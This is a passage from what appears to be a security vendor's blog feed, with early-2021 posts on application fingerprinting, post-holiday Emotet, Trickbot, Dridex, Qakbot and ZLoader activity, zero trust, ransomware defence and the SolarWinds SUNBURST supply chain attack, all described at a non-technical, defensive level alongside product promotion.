person based on height, blood type, DNA, (point-in-time) age, eye color, hair color, what kind of clothes they wear, speech patterns, how they walk, where they live, biological parents, etc. Some of these things can change easily while others are inevitably fixed. Using a cross-section of attributes provides the baseline for the application’s identity and allows administrators to add other more variable traits that further describe the application without losing confidence in the accuracy and viability of the identity. Using a broad variety of characteristics, organizations can choose the ones that comprise the correct combination of features, which allows them to make the best generalizations about the identity and behavior of the application when it’s communicating in the network. The fourth key to application identity: Upgrade-tolerance Created application fingerprints must be upgrade-tolerant, allowing for new versions of software without necessitating an overhaul of security policies every time software is patched or upgraded. A good illustration of upgrade tolerance is this: If you upgrade Java, the SHA 256 will be completely different, unpredictably different. But the fuzzy hash will be mostly the same because the binary underlined is still mostly the same. This means that, by using a measurement of similarity by the fuzzy hash, we can say when an application is upgraded and when it's similar enough that we can use the same rules to cover that application. Using a combination of changing and unchanging identity attributes is important because it lets the user upgrade, have different versions, and create varied rules around applications that are very similar rather than about very, very specific binaries. In short Security must remain malleable while enforcing the highest level of protection possible. When security can adapt to its environment or updates (as software/apps/services are wont to do), it’s allowing the organization to evolve without sacrificing efficacy. Creating application fingerprints using the four keys described here allows organizations to look at the most salient parts of an application/service that describe, in the most distinctive way possible, what applications are present and talking to each other on the network. Around this, security policies that travel alongside the application (independent of network topology) can be built, ensuring the protection stays with what needs it most. Read the datasheet to learn how Zscaler Workload Segmentation enables application identity. Tue, 02 Feb 2021 08:00:01 -0800 Harry Sverdlove Did COVID Cancel Christmas for Cybercriminals? ThreatLabZ, the security research team at Zscaler, is responsible for monitoring and tracking global cybercrime activity, which typically drops each year around the Russian Orthodox Christmas on January 7th. In most years, activity increases back to normal near the middle to end of January. However, in 2021, cybercrime activity did not exhibit this cyclical pattern, which may be explained by COVID-19 travel restrictions that prevented many threat actors from taking an extended leave. Figure 1 shows that cybercrime activity last year began to rise starting around January 15, 2020, following a lull. In contrast, this year’s criminal activity remained at normal levels before, during, and after the Russian Orthodox Christmas. ​Figure 1: Malware trends before and after the holiday season in 2019-2020 ​ Figure 2: Malware trends before and after the holiday season in 2020-2021 The following sections describe recent activities for five of the top malware families, including Emotet, Trickbot, Dridex, ZLoader, and Qakbot. Emotet [Update] – On January 27, 2021, Europol announced a global action in disrupting Emotet botnet operations. This was a collaborative effort between law enforcement authorities in the Netherlands, Germany, U.S., UK, France, Canada, Lithuania, and Ukraine, with international activity coordinated by Europol and Eurojust. Zscaler ThreatLabZ has been closely tracking Emotet for several years (see blogs from October 2019, February 2019, and August 2017). We can confirm that we haven't seen any updates or activity from the Emotet C&C infrastructure in the past 48 hours, which indicates that the takedown operation has been successful. However, we have seen similar gangs push out new variants and resurrect the botnet using a new C&C infrastructure. We are closely monitoring for any new Emotet variants and activity. Emotet resumed its activity as of Monday, January 4, 2021. To take advantage of the holiday season, Emotet briefly ramped up its activity between December 21 and 30, 2020. During this ramped-up activity, Emotet was mostly using a reply chain (also known as email thread hijacking) spam email as the bait. A reply chain attack is when threat actors hijack real email threads and utilize legitimate email messages stolen from victims’ email applications. The threat actors then spoof a legitimate email and impersonate a reply to the stolen email. This email reply is again targeted to addresses from the original email, allowing it to further gain trust from targets. While the first batch of emails was targeting English-speaking countries, spam emails in German, Italian, French, Spanish, and Polish followed shortly thereafter. An example of an Emotet reply chain spam email in Italian is shown in Figure 3. Figure 3: Emotet reply chain example The main Emotet loader had some minor changes after returning from a brief break. The build version number was set to 0x13461BF (20210111), while the loader version number still remained at 0x1388 (5000). Emotet continued to use spam with malicious Microsoft Word documents attached as the primary distribution method. On January 20, 2021, Emotet increased the build number to 0x13461C8 (20210120) and the loader version number to 0x1770 (6000). Another interesting tactical move by Emotet that started in January was the shift to password-protected ZIP attachments. Instead of including the password in the email body text, Emotet started using embedded images that contain the ZIP password. This tactic is likely to defeat automation deployed by security products and researchers. The group has also continued to use a DLL file for the loader instead of a standard Windows executable, which may be to further evade detection. Emotet was last seen deploying the following modules: Proxy (uPnP) module Browser password stealer (based on WebPassView) Email password stealer (MailPassView) Email content stealer Email contact stealer In addition, Emotet has been observed delivering Trickbot as a second-stage payload. Indicators - Emotet IOCs Trickbot Emotet started dropping Trickbot as a secondary payload on victim machines after it returned from the holiday break. Trickbot is operated by the same threat actor that deploys Conti and Ryuk ransomware. Therefore, these ransomware operations likely resumed around the same time as well. Emotet was distributing Trickbot with the group tags mor12 and mor13. There have not been any significant changes in Trickbot following the holiday break. Trickbot was also distributed by another spam campaign on the same day by the group tag rob35. This specific campaign was being distributed via SpamEx, which distributed a malicious JavaScript file embedded in a ZIP file. When opened, the JavaScript was used to invoke PowerShell to download and execute Trickbot from phishing sites. The Trickbot campaigns with the group tags tot6 and lib6 have also been observed since the holiday break. Indicators - Trickbot IOCs Dridex On January 11, 2021, ThreatLabZ observed the emergence of Dridex with a Cutwail spam campaign. The group used an invoice theme to distribute the Dridex loader. The Cutwail spam distributed payloads for Dridex sub-botnets 10444 and 10555 as Microsoft Excel attachments. Dridex continues using DLL files for the loader instead of Windows executables, a technique that has been recently employed by the Emotet and Qakbot threat groups as well. There was another Dridex campaign with botnet 111 observed a day later, which was using the RIG exploit kit (EK). The same RIG EK gate was used before the Christmas holiday. Indicators - Dridex IOCs Qakbot On January 19, 2021, Qakbot emerged with a new spam campaign dropping a Qakbot payload with the campaign ID abc118. Similar to Emotet, Qakbot is using reply chain spam email attacks. An example is shown in Figure 4. Qakbot was also seen using a “complaint copy" spam theme. Qakbot spam campaigns are distributing malicious Excel files embedded inside a ZIP attachment. Like Emotet, Dridex, and ZLoader, Qakbot is using a DLL file for the loader instead of Windows executables. This technique is now widely used by cybercriminals and is apparently able to evade security and sandbox solutions. Figure 4: Reply chain spam email distributing Qakbot Indicators - Qakbot IOCs ZLoader ThreatLabZ observed new ZLoader activity on January 11, 2021. The botnet then went quiet, resuming with another spam campaign on January 19. So far in 2021, four different ZLoader campaigns have been observed, primarily targeting US and EU banks and financial institutions. Indicators - ZLoader IOCs Conclusion Campaign frequency differs for each malware family. Some have more regular Monday through Thursday cycles, while others, such as Emotet and Qakbot, are unpredictable. Usually, inactivity by cybercriminals or the absence of a malware strain is a sign of impending changes. Malware authors continually adapt their techniques and change their code to improve distribution, persistence, evasion, and overall success. ThreatLabZ continuously monitors activity from cybercrime gangs and their evolving malware strains, integrating all threat intelligence into the Zscaler platform so it can be distributed cloud-wide to protect all customers around the world. Fri, 29 Jan 2021 14:19:11 -0800 Abhay Kant Yadav Cloud-to-Internet Communications: Six Key Challenges Cloud workloads need access to the internet for a variety of reasons, and opening that access introduces risk. While your workloads (hopefully) don’t have web browsers installed from which users are browsing suspicious websites, legitimate access might mean API connectivity to a third-party service, software update services, and more. While enabling this access, it is critical that you protect these outbound communications to prohibit bad actors from getting a foothold into your network. Unfortunately, secure workload access to the internet has historically been way more complicated and costly than it should be. Let’s use AWS as an example for this post, though most concepts are similar for the major cloud providers. Six challenges with workload-to-internet communications Most organizations will have a number of VPCs in which they host applications and other services. Within each VPC, vNGFWs are likely to be used to control east-west traffic flows within and across VPCs. To secure internet access for those workloads, you will typically build outbound VPCs in which to layer virtual security appliances. This may include virtual firewalls, DLP services, threat protection VMs, and more. Each of these services has a licensing fee, another vendor to deal with, and requires expertise to manage and operate properly. These services must be chained together, introducing latency and operational complexity. With service chaining, the performance of the entire system will be dictated by the slowest performing link in the chain. Because these systems always have scale limitations and are statically sized, you are faced with the choice of either dramatically over-provisioning to account for traffic bursts or risk a slow user experience or denial-of-service when unexpected traffic spikes do happen. Connecting the VPCs hosting your applications to your outbound security VPC(s) also requires the use of a Transit Gateway. The Transit Gateway acts like a cloud router and is a paid service with both a time and data-transfer cost component. Every VPC, including any security VPCs, must be manually attached, or peered, with the Transit Gateway. At this point, you’ll probably also create a management VPC, within which you will run firewall management and orchestration software to centrally manage the growing inventory of security services. So, even after the first five challenges, you end up with: High cost Poor scalability Questionable availability High overhead, error-prone management Poor visibility across many hops, making it difficult to troubleshoot Figure 1: Legacy security raises risk and complexity And, all of this complexity is to deploy into a single availability zone (AZ). Unfortunately, the process needs to be repeated for every AZ in your cloud footprint. Figure 2: For multi-cloud, complexity grows multi-fold Secure, simple workload-to-internet access Fortunately, there is a better path forward with Zscaler Workload Communications (ZWC). ZWC drastically simplifies internet security for cloud workloads by providing automated, flexible, and direct connectivity through the Zscaler Zero Trust Exchange. Powered by Zscaler Internet Access (ZIA) and Cloud Connector, the solution provides deep visibility and full control of outbound traffic from any cloud. ZWC provides a lightweight, fully automated deployment infrastructure that is operational in seconds. From there, simple business-level policies steer traffic to the Zscaler cloud via unified management. All internet access is protected by the scalable, secure ZIA service that is already protecting thousands of enterprises and millions of users globally. The benefits are clear, delivering: Simplified connectivity by eliminating backhauling and eliminating all peering, route distribution, and service chaining. Scalability via the power of the industry’s largest security cloud. Cloud Connector, which is deployed in your VPCs, is built on a DTLS architecture, delivering 4x-5x times better performance compared to IPSec. Visibility with full logging and a single, integrated platform that simplifies operations and troubleshooting. Figure 3: Zscaler Workload Communications: Secure, simple connectivity To deliver cloud security at scale, you cannot replicate an on-premises approach in the cloud. Zscaler Workload Communications provides security, simplicity, and high performance for workload-to-internet access. If the challenges highlighted in this post sound familiar to you, learn more about the full suite of Zscaler Cloud Protection services or contact us today. Thu, 28 Jan 2021 08:00:01 -0800 Rich Campagna The Zero Trust Architecture Through the Lens of U.S. Federal Agencies Ask five IT leaders from five different federal agencies to explain zero trust, and you will get five different definitions. I’ve noticed this disparity when speaking with them during workshops and roundtable discussions. And it’s understandable because any time a new term or technology is introduced, vendors claim that their solutions meet that definition—whether they do or not. Confusion is inevitable. The fact is that IT and security professionals naturally bring their own experiences and technology lenses to the adoption of any new technology. Let’s take a look at zero trust through some of those federal lenses. First, the network Some federal IT leaders began their exploration of zero trust by looking at their networks. About five to 10 years ago, federal organizations believed the network was the most important thing, establishing security mechanisms around the goal of protecting that network. But times have changed, and federal agencies are now looking beyond the network. One member of a federal cybersecurity team described the role of zero trust as “moving toward a place where logical network placement is not some kind of pseudo-authenticating mechanism, and dissolving, as much as possible, the notion of the strong network perimeter. The pandemic has been a catalyst for people to realize their strong network perimeter isn't what they thought it was.” What about IT? Some look at zero trust from an IT perspective. These federal leaders see IT’s role evolving from infrastructure-focused to product-focused or, in some cases, application-focused, and they see zero trust playing a critical part in that. IT’s mission and capabilities are moving toward supporting agency objectives. So, for some IT and networking leaders, zero trust will take on increased importance as it provides more complete security for the transport network—the internet—than legacy security models designed to only protect the data inside your network. Defining trust One federal leader I’ve spoken to believes the term zero trust is a misnomer because, if you don't trust anyone, nobody will get anything done. As he described it, the concept of zero trust is really a matter of establishing what trust levels are available and then figuring out what access you're going to grant based on a particular level. So it's just another way to say that entities (people, devices, applications) get least-privileged access, the minimum needed to get the job done. Another federal IT leader described the concept as variable trust, meaning that a user accessing the network on a corporate-managed or corporate-issued device will garner more trust than someone using an unknown device. The same applies to users attempting to access the network from inside the corporate office as opposed to a remote location. What are you trying to protect? An important question for many federal agencies is: What are you trying to protect? In many cases, protecting every device isn’t the goal, but rather protecting the data going to and from a device. So agencies are focused on moving protections closer to the assets that they are actually trying to protect. It’s all about access Federal agencies realize they must consider many factors when it comes to allowing someone access to an app or piece of data: Who is getting access? What are the assurances? How did they authenticate? In short, an agency will trust someone requesting access via a network managed on-prem to a greater extent than other forms of authentication, such as a username or password. Federal leaders seem to agree that zero trust is a better way to manage access. It's a better way for agencies to truly understand who's accessing their networks and data and what they are doing with that data. And they know you have to continually evaluate a multitude of factors to decide if a person can have and maintain access. As one federal leader said, you have to look at the bigger picture when it comes to zero trust. But access doesn’t only mean people As a perceptive member of a federal agency also said, people sometimes forget that it's not always a user accessing data. Your systems are also sharing data, and so are applications, often between different clouds. Many in our industry talk about data as if it's always sitting still, which it isn’t. A zero trust solution must protect data in motion as well as data at rest, applying agency policies with every connection. A simple test So, with federal IT and networking leaders looking at zero trust through different lenses, it might help to create a simple litmus test to determine if a so-called zero trust solution is actually a zero trust solution. One agency leader suggested looking at a solution and asking, “If the user’s device is inside the ‘castle,’ is that the primary mechanism around the security?” If it is, then it’s not a zero trust solution. It’s all about better protection While many within the federal space may have different perspectives on precisely what zero trust is or what constitutes a zero trust solution, in the end, they all have something in common. That is, finding a new way to protect their data, employees, and citizens in an evolving world of cloud, mobility, and telework. Read this GovLoop solution brief, Security Beyond the Desktop, or listen to this podcast to hear more about zero trust. Wed, 27 Jan 2021 11:33:08 -0800 Jose Padin Safeguarding Your Data in 2021 and Beyond For information on Zscaler Data Protection, check out our new guide. Data protection is defined as the process of safeguarding your important and sensitive information from corruption, compromise, or loss. There was a time when that amounted to preventing data from being moved inappropriately—either intentionally or accidentally—which could be handled with a good data loss prevention (DLP) solution. After all, your applications and servers were in the data center and your employees were mostly on the network. All you had to do was monitor the outbound gateway for data and destinations that met certain conditions. Fast forward to 2020. Most of your apps and data, including your sensitive customer data and your company’s IP “crown jewels,” had been migrated to cloud platforms. Then, right around March, all your office workers were suddenly sent home. A simple DLP solution, even if you’d added a cloud access security broker (CASB), was suddenly nowhere near adequate to give you control over the massive amount of data now distributed across your cloud apps. Why? Traditional DLP and CASB solutions were designed for specific functions, but they lack the broad data protection capabilities you need with users connecting to your data from everywhere, including unsecured networks and public Wi-Fi, and they fail to prevent misconfigurations in the cloud, which are one of the most common causes of data exposure. With SaaS and multicloud environments, it’s become far too easy for data to be inadvertently exposed due to a lack of visibility. There are other challenges as well: Your data is everywhere: Data is spread across clouds, SaaS, on users’ devices, and in the data center. Your data is encrypted: Connections to applications are encrypted and data exposure is largely hidden. Your compliance is unknown: Application deployment and usage are spread across locations and groups making unified assurance impossible. To address these challenges, you need a comprehensive data protection strategy that gives you the big picture of your environment—every user, application, and device that is accessing or moving your data. If you tried to build a solution with point products, you would end up with massive complexity and a disjointed view of your environment. Instead, you need an integrated solution that provides unified visibility and policy enforcement, with capabilities that include DLP with Exact Data Match and CASB (inline and out-of-band) as well as browser isolation, cloud security posture management, SaaS security posture management, and SSL inspection at scale, so you can: Follow and secure users off-network without any performance degradation: A purpose-built SASE architecture delivers comprehensive data protection as part of a large, integrated platform built on a high-performance inline cloud distributed across 150 global data centers. Inspect all of your encrypted traffic: The Zscaler Zero Trust Exchange inspects ALL SSL traffic for data exposure with unlimited inspection capacity per user. Gain visibility into compliance: Zscaler Data Protection allows you to easily maintain compliance by scanning your SaaS, Microsoft 365, and public clouds for violations and misconfigurations. Reduce risk with inline enforcement: Zscaler sits inline so it can block sensitive information before it leaves your network—instead of being limited to damage control after data has been compromised. Simplify data protection with one platform and one policy: Secure all your cloud data channels—data in motion, at rest, and across endpoints and clouds—with one simple, unified platform—the Zscaler Zero Trust Exchange. Today, almost a month into 2021, the questions about an eventual return to the office persists, though most agree that we are likely to see a “hybrid” workforce with employees in the office some of the time and working remotely the rest of the time. In other words, work-from-anywhere is here to stay. This reality has accelerated the migration to public clouds and services that simplify access. That means it’s time to rethink your data protection strategy and search out a data protection solution that prevents data loss, helps maintain strict compliance, automatically remediates cloud misconfigurations, and has the visibility to follow your users and data off-network. All without adding complexity or hindering performance for users. Learn more about evolving your data protection strategy to address the challenges of today’s cloud-first, work-from-anywhere environment with Zscaler in our latest ebook, Safeguarding Your Data in a Work-from-Anywhere World. Tue, 26 Jan 2021 08:00:01 -0800 Jen Toscano Applying Zero Trust to Cloud Workloads Over the last few years, zero trust has achieved widespread acceptance and adoption, and rightly so. The zero trust security model significantly reduces risk by minimizing the enterprise attack surface and limiting the ability for bad actors to move laterally within a network. With zero trust, organizations move from a “trust but verify” approach to “never trust, always verify.” Technically, zero trust applies to all users, devices, and workloads, but in most organizations, zero trust has become synonymous with user access to applications. As organizations shift to the cloud, applying zero trust principles to cloud workloads is as critical as applying the model to user access. So, how do you accomplish this? Start by assuming that everything—both internal and external to the network—is untrusted and requires verification prior to being granted access. Authenticating and authorizing everything attempting to access the network builds an identity for all workloads. Then, use that identity to build least-privilege policies that restrict workload access to only what is absolutely necessary. Identify users AND applications A core principle of zero trust access is all users must be authenticated and authorized before granting access. Most implementations will leverage not only strong authentication, but several elements of context, such as endpoint posture, when making access decisions. With workloads, authentication and authorization are a bit more challenging to achieve, but easily doable with the right technologies. In most implementations, unless workloads have been identified by a set of attributes—like a workload fingerprint or identity—they are untrusted and blocked from communicating. Zscaler Workload Segmentation, for example, computes a cryptographic identity for every workload. This identity takes into account dozens of variables, including hashes, process identifiers, behaviors, container and host ID variables, reputation, hostnames, and more. This identity is verified every time a workload attempts to communicate and is paired with least-privilege policies when determining whether or not to grant access. Least-privileged access for users AND applications Prior to zero trust, the model for users, whether they were on the local network or remote, assumed that the user could be trusted with permissive access and that their identity was not compromised. Basically, users could access anything on the corporate network, making it very convenient for bad actors to move laterally across an organization’s network. Zero trust changes that by implementing least-privilege principles, granting user access not to networks, but only to the specific applications and resources that a user needs to get their job done. In this model, if a user’s identity is compromised or if that user becomes malicious, the amount of damage they can do is limited by a much narrower set of resources and applications they can access. As we have learned from countless ransomware and malware attacks and compromised legitimate software—such as was the case with the SolarWinds attack—applying similar least-privilege concepts to workloads can dramatically lower the risk of a breach and limit the blast radius of compromised or malicious software. Least privilege for cloud workloads means that rather than creating flat networks, which allow overly permissive access in your cloud environments, your policies must only allow access to the users and applications that the workload requires in order to function properly. Zero trust for cloud workloads Once these two steps are completed, only known and verified workloads can communicate on the network. Now, those workloads only have access to the users, applications, and resources necessary for that workload to function properly. The result? Dramatic risk reduction and elimination of attack surface. Malicious software will be unable to authenticate and will be kept off the network entirely. And if a bad actor is able to compromise a workload, the attacker's ability to move laterally across the network will be severely curtailed. Thu, 21 Jan 2021 08:00:01 -0800 Rich Campagna Combating Ransomware with Zero Trust The scourge of ransomware attacks continues to plague nearly every public-sector institution and private organization. No one is immune. In 2019, there were more than 140 ransomware attacks against governmental and health care organizations, and in 2020, hospitals, in particular, were relentlessly targeted. It’s critical for every IT pro, in every industry, to defend against ransomware. Read the white paper Defending Against Ransomware with Zscaler Workload Segmentation. Ransomware is not a new threat The first example appeared as early as 1989, but cybercriminals didn’t start launching widespread attacks until about 2012. Typically, ransomware takes one of two vectors to infect a network: a phishing attack or by exploiting security loopholes. In the case of a phishing attack, the target receives an email with a document that, once opened, launches the ransomware. In some cases, the attack may use social engineering tools to trick the user into providing the malware with credentials that facilitate the attack. Other types of ransomware don’t require clicking on an infected document. Instead, they take advantage of security holes to compromise systems. NotPetya provides a particularly nasty example of this variant. In one case, it exploited a backdoor in an accounting package popular in Ukraine and then spread to other systems through security flaws (now patched), known as EternalBlue and EternalRomance, in the Windows implementation of the SMB (server message block) protocol. What makes NotPetya so destructive is that there’s no ransom demand. Instead, NotPetya generates a random number to encrypt all data it encounters, permanently destroying it. There’s no way to recover the key to decrypt the data. In recent years, ransomware has become much more sophisticated. Many strains no longer encrypt the first machine they encounter. Instead, the malware first surveils the environment to determine how it can move laterally across the network to infect additional resources, often taking advantage of legitimate tools, such as Security Account Manager Remote (SAMR) protocol reconnaissance and domain name server (DNS) reconnaissance using nslookup. With this information, the malware can quietly move across the network to deposit ransomware into additional systems. Once a critical mass has been achieved, the ransomware encrypts all of these resources at once, delivering a crippling blow to the organization. Defending against ransomware We often hear that the best defense against a ransomware attack is robust data protection. After all, if you have backups, you don’t need to pay the ransom and can simply restore all files. Even if the malware does successfully encrypt an organization’s data, so long as the backup and disaster recovery (DR) files are intact, the organization can avoid paying the ransom and IT can restore everything to a point before the attack. But backups are best kept as a last-ditch defense, not the front line. After all, if the attack is devastating enough, IT may face restoring petabytes of data, a process that can take days or even weeks to complete, impeding business operations for an extended period of time. Even worse, if backups are connected to the network, it’s possible for ransomware to digitally shred them as well, leaving no other option but to pay the ransom, which is a terrible position to be in, and not just due to the cost. After officials in Lake City, Florida, paid a ransom to decrypt their affected data—roughly a couple hundred terabytes—the decryption process took more than eight days to complete. For larger organizations with petabytes of data, the process could take more than a month. Likewise, we often hear a lot about the importance of training employees how to avoid clicking on documents used in phishing attacks, but this, too, is nowhere near sufficient. Cybercriminals are constantly developing novel ways to trick employees, and, in a sufficiently large organization, someone will eventually make the mistake of clicking on an infected file. What’s more, employee training does nothing to defend against attacks that exploit security holes—no one has to click on anything for these to succeed. A zero trust approach to thwarting ransomware In a zero trust environment, all internal communications are treated as potentially hostile. Each communication between workloads must be authorized before it is allowed. In this way, zero trust can stop ransomware from moving laterally across the network, which can mean the difference between the malware encrypting a single laptop and encrypting hundreds of servers and datastores around the globe. Zero trust is enabled by microsegmentation, but traditional methods of microsegmenting a network depend on “trusted” IP address. That poses significant operational and security concerns. Operationally, policies break when the underlying network changes—and modern networks are constantly changing. It’s even more difficult to manage policies in autoscaling environments, such as the cloud or containers in which IP addresses are ephemeral. IT would have to constantly update policies as IP addresses change, which is labor-intensive and prone to errors. What’s more, ransomware can evade address-based controls by piggybacking on approved firewall policies because firewalls are not designed to distinguish good software from bad software. There is a new model for microsegmentation, however, that relies on the identity of communicating software, hosts, and devices, separating the control plane from the network for better security and easier operations. With an identity-based approach, each workload is assigned an immutable, unique identity (or fingerprint) based on dozens of properties of the asset itself, such as the UUID of the bios, serial numbers of processors, or an SHA-256 hash of a binary, which is then verified before the workloads are allowed to communicate. This identity verification prevents malicious software, or devices and hosts, from communicating. For example, let’s say that someone clicks an infected file, which launches ransomware on that user’s desktop machine. If the ransomware tries to use the SAMR protocol or nslookup to conduct network reconnaissance, identity-based zero trust policies would block that communication, because the ransomware is not authorized. Likewise, attempts to move to other assets would also be denied. In this way, even if ransomware gains an initial foothold in the network, the damage that it can do is limited to an annoyance as opposed to a global business catastrophe. Learn more by reading the white paper Defending Against Ransomware with Zscaler Workload Segmentation. Tue, 19 Jan 2021 08:00:02 -0800 Dan Perkins Supply Chain Attacks ABSTRACT In this article we will review what supply chain attacks are, how they evolved, and how we ended up with SUNBURST, a supply chain attack targeting the famous monitoring platform SolarWinds Orion. We will also discuss how this advanced adversary evaded common detection capabilities, and how you can determine if you have been affected by this attack. It further provides some recommendations on how to deal with these types of attacks in the future, using commonly known principles and available technologies. Introduction Supply chain attacks—attacks against the supply or value chain of an organization in order to gain access to a downstream target—often sound like stories of targeted attacks that only occur against government agencies in Hollywood movies. In reality, while these attacks involve a high degree of planning and sophistication, they can have a devastating real-world impact on organizations in the blast radius of the original compromise, like the case of the recent SolarWinds attacks. In general, we differentiate between two major types of attacks focusing on an organization’s supply or value chain. “Island hopping” attacks target potentially vulnerable partners or elements in the value chain with potential privileged access to the actual target network. Derived from the island hopping strategy of the United States in the Pacific campaign in WW2, this type of attack may include multiple vulnerable elements in order to gain access to the actual target of the attack. We have seen these types of attacks with prominent targets in the retail industry, which involved suppliers as the initial entry point, and also in plenty of other industries in similar forms. “Supply chain” attacks are slightly different, as they seek to exploit the trust relationship established from legitimate products used in normal business operations. These types of attacks seek to gain unauthorized access to a target organization by implanting backdoors into products used by the target organization—most commonly via delivery of automated patches or software updates. Such attacks have also been observed targeting technology companies, including antivirus vendors or makers of network security equipment, but are surely not limited to such companies due to the wealth of other potential high-value targets. Both of these types of attacks might target more than one organization, and the objective might be to gain access or to collect information on whole industries or widespread organizations or individuals. At the same time, organizations that are simply used as one of these islands can also incur massive reputational and business damages, while not even being the actual target of such a campaign. The evolution of supply chain attacks As news broke in 2013 and 2014 about attacks against Target and Home Depot, organizations worldwide started evaluating their value chain and its data interconnectivity. These attacks were the description of island hopping attacks, performed through suppliers by cybercriminals to harvest payment card information at a large scale. Data interconnectivity between companies allows organizations to implement highly efficient processes: from design, to prototyping, to manufacturing, to logistics, to just-in-time delivery to the end customer. While these tightly interwoven connections help companies save billions of dollars through increased efficiency and bring innovation to market at unprecedented speeds, the attacks of the early 2010s reminded organizations of the attack surface such connectivity provides to adversaries. As a result, security professionals started viewing business partners that require their process automation to be connected to their networks with the same distrust as any other anonymous connection. This shift led to increased security awareness and additional controls to monitor interconnectivity; increasingly, security certifications such as ISO 27001 (which in its annex 15 specifically calls out the security evaluation of vendors in the value chain) were required of such partners before a connection between networks was established. Most of these island hopping attacks rely on the presence of authorized access, or an exploitable vulnerability in the form of a software weakness or misconfiguration in systems. As organizations become more diligent and disciplined about patching existing systems, applying best practice configurations, and segmenting their networks, it becomes less easy for adversaries to find exploitable weaknesses than it used to be. In 2015, allegations surfaced of a secret backdoor in the Secure Shell (SSH) authentication mechanism of Juniper’s JunOS. This attack, implanted by an unknown threat actor into the equipment of a prominent U.S.-based network security equipment manufacturer, may have been in place for years. During that same year, a suspected backdoor embedded in a popular antivirus product was involved in a high-profile leak of highly classified information of the National Security Agency. While largely unnoticed to the broad public, the news about these types of backdoors put many security professionals on high alert, as such attacks exploit the trust we put in the integrity and inherent security of such technologies. The supply chain attack involving SolarWinds Orion in late 2020 only marks the latest example of this type of attack. A Solar Storm Much has been written about the supply chain attack involving the backdoor dubbed "SUNBURST" within the SolarWinds Orion platform. Rather than dissecting the technical details yet again, it is important to take a look at what companies should do to identify whether they were affected and what the next steps should be. Who is affected? The easiest ways to identify whether you were affected as an organization is to identify if one of the compromised SolarWinds Orion products and versions is being used in your environment (read our blog). To maintain operational security, in their efforts to remain undetected, the adversary in this specific attack appears to have only used the backdoor in SolarWinds Orion in cases where the target environment appeared of specific interest. Whether access was attempted and obtained can only be determined by analyzing network activity to some extent. This is because the campaign was suspected to have started on or before March 2020 and did not involve any known indicators of compromise. Due to the sheer volume of data involved, many organizations do not keep access logs long enough to determine whether or not a successful compromise occurred. Did protections fail? Detecting the SUNBURST backdoor implanted in SolarWinds Orion is difficult to accomplish with existing automated capabilities, even ones designed for identifying previously unknown threats such as malware sandboxes. This difficulty is due to a list of factors that showcase the extreme care the adversaries took to hide their tracks. The backdoor was delivered through a legitimate software update to a known monitoring and management tool. It also required the software update containing the backdoor to be successfully installed, which required specific software components to already be present on the target system. Most sandboxes use operating system versions commonly found on endpoint systems, and only include a list of common applications to mimic an end-user system. Even after the installation of the backdoor, the adversary took precautionary steps to avert detection in a sandbox environment—for example, by waiting days before for any callback to the command-and-control infrastructure, as well as verifying if the software was running in a lab vs. production environment. The best opportunity to detect this backdoor and its activity would have been to closely monitor abnormal network activity from the SolarWinds Orion platform as it started to phone home. However, in this case, the actor took care to avoid tipping off the usual signals we are well prepared to detect. For example, the command-and-control infrastructure was set up in the countries of the victims, rather than geos we are trained to view with suspicion. Furthermore, to ensure that connections to a newly registered domain did not tip off security operators, the command-and-control domain used was registered well ahead of time, months prior to the suspected start of the campaign. Finally, the adversary included naming conventions of the targeted organizations into the DNS names of the command-and-control infrastructure to mislead security operators into dismissing any potential suspicion as a false-positive finding. After the initial compromise, the adversary used well-known tools and techniques to harvest admin credentials, establish persistence, and gain remote access to the compromised system. Such activity could have been detected by most endpoint detection and response (EDR) products by monitoring system activity on affected systems. However, in many cases, EDR products are not deployed to server systems, and more attention is paid to endpoints. In short, detection of this specific backdoor implanted in legitimate software was incredibly difficult to accomplish, although far from impossible. Protecting against supply chain attacks The big question is: how can we address the supply chain as a potential threat vector moving forward? While protecting from backdoors or vulnerabilities introduced into trusted software or components by malicious third parties is a difficult undertaking, some of the same principles that helped to defend against island hopping attacks can be applied here as well. Minimal access required In the case of attacks against the technologies we use to run our businesses, the basic concepts of a zero trust architecture can provide an effective defensive layer to significantly limit the impact of “trojanized” technologies. If adversaries successfully implant a backdoor into software or hardware that is connected to our networks, or even part of the network fabric, they still require access beyond the component, and will only have as much access to the environment as the component itself. Therefore, restricting inbound and outbound component access to the minimum of what is absolutely required to function limits adversaries’ abilities to exploit their position, potentially dramatically. For this purpose, it is important to analyze any solution not only for the access and privileges it requires to function, but also to who requires access to specific functions within it. For example, any server application that is trying to establish a connection to an internet-facing resource should only be allowed to do so for very specific documented and expected use cases, such as connecting to update servers or network time servers, etc. At the same time, every solution needs to be analyzed and assessed for exactly the access the solution itself requires to function. For example, if a monitoring solution is put in place, it might not require privileges to write or make changes to any system. It might even only need read access to a very specific service or set of data, rather than to the system as a whole. Strong authentication and monitoring Finally, a careful assessment of who requires what level of access to an application or system, and how such access can and should be secured, needs to be performed. Such an assessment will provide the access controls that ultimately limit an adversary’s ability to reach and use potentially “trojanized” technology and to move laterally. For example, systems that rely on privileged access to other systems and components in a given environment by definition present high-value targets. Access to these network components or systems should require multifactor authentication for any administrative access, which in itself should be granted on an as-needed basis. The usefulness of the measures described here are in no way limited to what we have observed over the past month surrounding the SolarWinds breach. In particular, limiting access to and from the SolarWinds Orion Platform, and requiring strong authentication to access, could have made it significantly more difficult for the adversary to exploit and gain access to the environment, while making it easier to detect activity that was not expected. After all, the discovery of this attack started with the detection of a suspicious logon event using stolen credentials. Trusted but verified vendors Depending on the type of service or industry, different available certifications of cybersecurity practices can help organizations assess how well solution providers are equipped to detect, prevent, and deter unauthorized access or modifications to their data, products, and services. The most prominent of these certifications is likely ISO/IEC 27001, as it asserts that a company not only follows and adheres to security practices that ensure confidentiality, integrity, and availability, but also makes these aspects a responsibility of top management. Therefore, the first strategy to prevent supply chain attacks is to carefully assess and monitor how your organization’s vendors implement and follow security practices. For example, ISO/IEC 27001 annex 5 specifically calls out such a review of an organization's supply chain. A variety of cybersecurity audits are available to provide certifications for companies attesting to secure system architectures, implementation of security and response processes, and adherence to general security best practices. For example, security certifications for cloud service providers are available and should be mandatory before using such services, with the most prominent example being the SOC 2 certification family. This certification expands the concepts of ISO/IEC 27001 by requiring organizations to implement specific technical and procedural safeguards to guarantee not only availability and integrity of the service provided, but also the security of customer and user-specific data. Another prominent industry-specific example of certifications for cloud service providers is FedRAMP, with its different impact levels, required by the U.S. government. These are just some examples in a long list of certifications that exist, with many specific to industries and geographic areas. Conclusion SOLARSTORM surely presents a somewhat rare event, simply because of the amount of planning, the careful execution, and the attention paid to cleaning up. However, the impact it had upon affected organizations is not something that should be ignored as a once-in-a-lifetime 